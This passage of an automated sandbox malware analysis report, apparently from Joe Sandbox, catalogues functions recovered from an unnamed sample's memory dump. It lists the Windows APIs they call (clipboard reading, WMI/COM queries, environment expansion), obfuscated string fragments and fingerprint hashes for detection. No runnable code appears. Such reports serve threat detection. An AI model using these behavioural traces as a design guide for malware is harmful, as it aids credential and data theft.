                                                                                                                      • String ID: F;D$zx$'Y<[$(]2_$2U/W$2{<u$3416$3416$6fd$7J0H$7w$:vt$N>_<$SP$Ta\c$Teg$Vt%t$Z[$bxP$qVol$s@qF$wDuJ${HyN$jh$nl$zx
                                                                                                                      • API String ID: 0-1851612794
                                                                                                                      • Opcode ID: dbfc0c5623d6a7e81378846a663c88e786f5e2eee7484ef0a8345aa9688d9606
                                                                                                                      • Instruction ID: 2cc7bad3c05c2fbdbe8eec2cc1b782d9f086c5bda073d882b1fe122a835e9a93
                                                                                                                      • Opcode Fuzzy Hash: dbfc0c5623d6a7e81378846a663c88e786f5e2eee7484ef0a8345aa9688d9606
                                                                                                                      • Instruction Fuzzy Hash: 64B241B160C3958AD334CF14C8427ABBBF2FF95304F05892CD4C99B292D7759A4ADB86
                                                                                                                      Function 0051D0D0 Relevance: 30.7, APIs: 10, Strings: 7, Instructions: 957memorycomCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0051D572
                                                                                                                      • SysAllocString.OLEAUT32 ref: 0051D608
                                                                                                                      • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0051D646
                                                                                                                      • SysAllocString.OLEAUT32 ref: 0051D6A8
                                                                                                                      • SysAllocString.OLEAUT32 ref: 0051D765
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0051D7D6
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0051DB5D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$BlanketCreateFreeInitInstanceProxyVariant
                                                                                                                      • String ID: fF$CfF$[B$[J$tu$yv${pqv
                                                                                                                      • API String ID: 2895375541-1972840126
                                                                                                                      • Opcode ID: e41f05c7ec9ad893a2ed073f4cb7c19cc7d3f5179323b1d1f2e8f73d4b498f00
                                                                                                                      • Instruction ID: 409af79b2cb7491ce1d81e74bc4981cda99fd8cf3bf4bd6cc146e7589f82fed8
                                                                                                                      • Opcode Fuzzy Hash: e41f05c7ec9ad893a2ed073f4cb7c19cc7d3f5179323b1d1f2e8f73d4b498f00
                                                                                                                      • Instruction Fuzzy Hash: CB6225726483108FE324CF68C8857ABBBE1FF95314F19892CE4D58B391D7799849CB92
                                                                                                                      Function 004F7222 Relevance: 23.9, APIs: 4, Strings: 9, Instructions: 1137COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$*$7$>gVf$TW$WH$X2c0$ruO$}&'$
                                                                                                                      • API String ID: 0-2009591350
                                                                                                                      • Opcode ID: ede323d21d9adc63507a8d24c1e3825c680467886bde395f0e8ebb12be8fa9f9
                                                                                                                      • Instruction ID: 74efa74b39c0b3188d7bc13ee27ea4891a85cf2fb5dc541fe1aab5074d9340c0
                                                                                                                      • Opcode Fuzzy Hash: ede323d21d9adc63507a8d24c1e3825c680467886bde395f0e8ebb12be8fa9f9
                                                                                                                      • Instruction Fuzzy Hash: EF7223715083528BD324CF28C89177BBBE1FF95314F18896DE5C58B3A2E7788906DB86
                                                                                                                      Function 004F618C Relevance: 13.5, Strings: 10, Instructions: 1044COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$6y$YjM$YjM$fjM$fjM$pSlM$yx$y~${
                                                                                                                      • API String ID: 0-3274899816
                                                                                                                      • Opcode ID: ab5ceebf091210f7bfeddcfbe24c8d7a311c8fcfb273be3fd531cffd31dde4e1
                                                                                                                      • Instruction ID: 4c1985e322bf554370062c107d2a98afad4a8f2c3393dfec6233c868ce6aa52a
                                                                                                                      • Opcode Fuzzy Hash: ab5ceebf091210f7bfeddcfbe24c8d7a311c8fcfb273be3fd531cffd31dde4e1
                                                                                                                      • Instruction Fuzzy Hash: 6262E1701083418FE724CF24D895B7BBBE1FF96314F154A5DE1D68B2A2D738980ACB96
                                                                                                                      Function 004F1BDE Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 555COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$&$5$A$J$t
                                                                                                                      • API String ID: 0-1619763526
                                                                                                                      • Opcode ID: 8a288d76c54298868ff3c3276a2c78f9d94d32f3f297b0cf030807f293e801e5
                                                                                                                      • Instruction ID: d2f10bd70ad50f74d124397f02710571a92f37b3dc3c785659697775c045ae95
                                                                                                                      • Opcode Fuzzy Hash: 8a288d76c54298868ff3c3276a2c78f9d94d32f3f297b0cf030807f293e801e5
                                                                                                                      • Instruction Fuzzy Hash: C122BF7150C7808BC7249B39C5943AFBBE1AFD5324F194A2EE9E9873C2D77889058B47
                                                                                                                      Function 004EB280 Relevance: 10.4, Strings: 8, Instructions: 384COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                                                                                                      • API String ID: 0-3323421312
                                                                                                                      • Opcode ID: 4b2e3b170f9843f770f718cf3cb09b460eaeb694b777f33e9bccdffa6f9f90df
                                                                                                                      • Instruction ID: c643c7cb93e478496918974cd00348dbc19cac6e1519763270fc898ceedf842b
                                                                                                                      • Opcode Fuzzy Hash: 4b2e3b170f9843f770f718cf3cb09b460eaeb694b777f33e9bccdffa6f9f90df
                                                                                                                      • Instruction Fuzzy Hash: 06D1147150C3818BD724CF2A849436BFBE2EFD1709F18896DE4E45B385D779890A8B87
                                                                                                                      Function 004E9360 Relevance: 10.3, Strings: 8, Instructions: 272COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                                                                                                      • API String ID: 0-1466227541
                                                                                                                      • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                                      • Instruction ID: 35937991343beb03a5ecdb9d7bb5f856f1a6363c8d0b7a50fe11a8ee5fe279f6
                                                                                                                      • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                                      • Instruction Fuzzy Hash: 2371F27158C3C28AD3118F7AC4A076BFFE09FA2351F1C496DE4D44B382D37989099B9A
                                                                                                                      Function 004EE16E Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 345COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Uninitialize
                                                                                                                      • String ID: RYZ[$UGC9$Zb$c[i!$yR
                                                                                                                      • API String ID: 3861434553-210946138
                                                                                                                      • Opcode ID: 418428d24bd5ac4c64d9e9f2e00c578d25f795fa750c531a236eba7d510f3bfc
                                                                                                                      • Instruction ID: a11b328ce862a72d314a7c71782f6199bb733fd58bc7f09db60c28d5c7bb2d77
                                                                                                                      • Opcode Fuzzy Hash: 418428d24bd5ac4c64d9e9f2e00c578d25f795fa750c531a236eba7d510f3bfc
                                                                                                                      • Instruction Fuzzy Hash: 9EC1FF7150C3D08BDB348F26D4683ABBBE1AFE2305F08496DD8D95B386D778450ACB96
                                                                                                                      Function 0050A7F0 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 573COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0050A8F7
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0050A9CF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID: *$*$q
                                                                                                                      • API String ID: 237503144-4001757600
                                                                                                                      • Opcode ID: 9a0f6172832833ec89b45c834c884d884f7dae40e4d4b1d760d07a957f41dd4b
                                                                                                                      • Instruction ID: 4dc7b0a04a3e52e70ba1e40cdfd26659a99c73c995bb1ae1a7a2b17bcb4f8204
                                                                                                                      • Opcode Fuzzy Hash: 9a0f6172832833ec89b45c834c884d884f7dae40e4d4b1d760d07a957f41dd4b
                                                                                                                      • Instruction Fuzzy Hash: 7D02E3B26083158FD724CF24D89136FBBE1FFD5304F158A2DE5998B291DB74990ACB82
                                                                                                                      Function 00501B30 Relevance: 9.3, Strings: 7, Instructions: 527COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID: !@$,$0$6$p$q$v
                                                                                                                      • API String ID: 1279760036-585546663
                                                                                                                      • Opcode ID: f57ca701dc81e82b44fea541e58da61511de0fe11aee4d434a5e18e733c8921b
                                                                                                                      • Instruction ID: 4b235f2b4281697abd1abe3c964af065c66651c444c7cf58f7af3132789d8982
                                                                                                                      • Opcode Fuzzy Hash: f57ca701dc81e82b44fea541e58da61511de0fe11aee4d434a5e18e733c8921b
                                                                                                                      • Instruction Fuzzy Hash: BC22DC7160C7818BD3249B28C49936EBFE1BBC5324F188A2DE5EA873D1D7798845CB47
                                                                                                                      Function 004E9660 Relevance: 9.2, Strings: 7, Instructions: 448COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
                                                                                                                      • API String ID: 0-2829372548
                                                                                                                      • Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                                                                      • Instruction ID: 3794566ec680aa9b741a0d49edef423271a06223b028f4fc5b2a3a984a9c4aef
                                                                                                                      • Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                                                                      • Instruction Fuzzy Hash: BED1E2B160C7D18BD729CF29845136BBBE1AF97314F0889AED0D58B382DA3D8909C756
                                                                                                                      Function 004E9B70 Relevance: 9.2, Strings: 7, Instructions: 418COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EVA^$UJVM$VW$]NGD$b$~9$yR
                                                                                                                      • API String ID: 0-3900434141
                                                                                                                      • Opcode ID: bf9b89a3dc64eafc51fc561be2a5340904c5020895b983a421964d81f63871af
                                                                                                                      • Instruction ID: 5585a1dd00a947e91706c75a25321cb6199bd5d65ebac192a7ea3fb1860bf110
                                                                                                                      • Opcode Fuzzy Hash: bf9b89a3dc64eafc51fc561be2a5340904c5020895b983a421964d81f63871af
                                                                                                                      • Instruction Fuzzy Hash: 5AE1D2B15083808BD724CF25C8947ABBBE5FF95308F08892DE1D99B392DB798509CB56
                                                                                                                      Function 00517A60 Relevance: 9.1, APIs: 6, Instructions: 119clipboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1006321803-0
                                                                                                                      • Opcode ID: 3e7a58182ace4d10c3b20726ad97e29be3b83721a356b7cb6e84f8d308346dcf
                                                                                                                      • Instruction ID: 3d7d6a7059907db70ae1072359b28edc33da9419f7efb965625b8c1609d22698
                                                                                                                      • Opcode Fuzzy Hash: 3e7a58182ace4d10c3b20726ad97e29be3b83721a356b7cb6e84f8d308346dcf
                                                                                                                      • Instruction Fuzzy Hash: 3B41697150C7858EE300AF7C84593AEBFE1AF96304F084D6DE4D586282E779868DD7A3
                                                                                                                      Function 0051C6C0 Relevance: 9.1, Strings: 7, Instructions: 361COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: >$A$O$f$g$j$q
                                                                                                                      • API String ID: 0-654885204
                                                                                                                      • Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                                                                      • Instruction ID: 36ca4a41951c767f4b7fa146fbd2baf6afaaca225ceda9c57ea3177b0ab399e9
                                                                                                                      • Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                                                                      • Instruction Fuzzy Hash: FCD10733A4C7D04AE324853C885539BAED26BE2334F1D8B7DE9F5873C6D66A88458353
                                                                                                                      Function 00508B10 Relevance: 8.0, Strings: 6, Instructions: 513COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Gt$J[$LUC_$we`k$x}{z$|A
                                                                                                                      • API String ID: 0-4062276182
                                                                                                                      • Opcode ID: 5242b20db249374f548befd3ae388d387b4cce62a5eb374f32c09aa2170ae452
                                                                                                                      • Instruction ID: d69f25f24b46313ff919967e1bc14435f9d3ac20fe62aa1e68cd5bd0bb42d75c
                                                                                                                      • Opcode Fuzzy Hash: 5242b20db249374f548befd3ae388d387b4cce62a5eb374f32c09aa2170ae452
                                                                                                                      • Instruction Fuzzy Hash: 930210B69083508BD3209F25D84576FBBE2FFD6318F054A6CE5C84B391DB75980ACB82
                                                                                                                      Function 004E42C0 Relevance: 6.7, Strings: 5, Instructions: 465COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$)$IDAT$IEND$IHDR
                                                                                                                      • API String ID: 0-3469842109
                                                                                                                      • Opcode ID: c272bf2933219e87cb432f78ce5040f500633e55d6025125259a93a6b3a6bbfb
                                                                                                                      • Instruction ID: e86088d5b928c68f46902d00aec22f59984e88f13b8d93f3fc53f56ffea68c2f
                                                                                                                      • Opcode Fuzzy Hash: c272bf2933219e87cb432f78ce5040f500633e55d6025125259a93a6b3a6bbfb
                                                                                                                      • Instruction Fuzzy Hash: CA02D4706083808FD710CF2AD89076BBBE1EFD5305F14856EEA858B392D379D909CB96
                                                                                                                      Function 004EC080 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 50$DM_e$FwPq$Js$'!
                                                                                                                      • API String ID: 0-1711485358
                                                                                                                      • Opcode ID: 837efeaaad5df26a6e617070a359593be79e849363dfbf838b1006a9fd387b09
                                                                                                                      • Instruction ID: 3d20b7f0b419d0eff98a4d573d892272b00817aab2bfed931f06de4a601fe54b
                                                                                                                      • Opcode Fuzzy Hash: 837efeaaad5df26a6e617070a359593be79e849363dfbf838b1006a9fd387b09
                                                                                                                      • Instruction Fuzzy Hash: 0A51D9B45493808FE338CF21C991B8BBBB1BBA1304F649A0CE6D95B254CB759046CF97
                                                                                                                      Function 004F9B30 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 947COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 004F9FF7
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 004FA039
